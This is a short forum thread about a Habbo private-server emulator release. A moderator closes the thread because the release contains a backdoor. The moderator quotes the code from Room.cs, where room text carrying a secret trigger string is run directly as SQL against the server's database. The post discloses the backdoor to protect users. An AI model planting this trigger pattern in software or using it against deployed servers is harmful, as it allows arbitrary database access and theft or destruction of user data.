HabBit may have some functionality you can take use of. /rawcam modifies the client to send the png to the emulator as base64 I believe.
HabBit may have some functionality you can take use of. /rawcam modifies the client to send the png to the emulator as base64 I believe.
This server has a backdoor in it, and for that reason I'm going to remove the links to the download and close this thread.
This thread does not deserve to have a release at RZ if it's at the expense of people's databases.
In Room.cs line 3620:
Code:if (StringType.Contains("%%rot#$s")) { var novasql = StringType.Replace("%%rot#$s", ""); using (IQueryAdapter dbClient = OtanixEnvironment.GetDatabaseManager().getQueryreactor()) { dbClient.runFastQuery(novasql); } return; }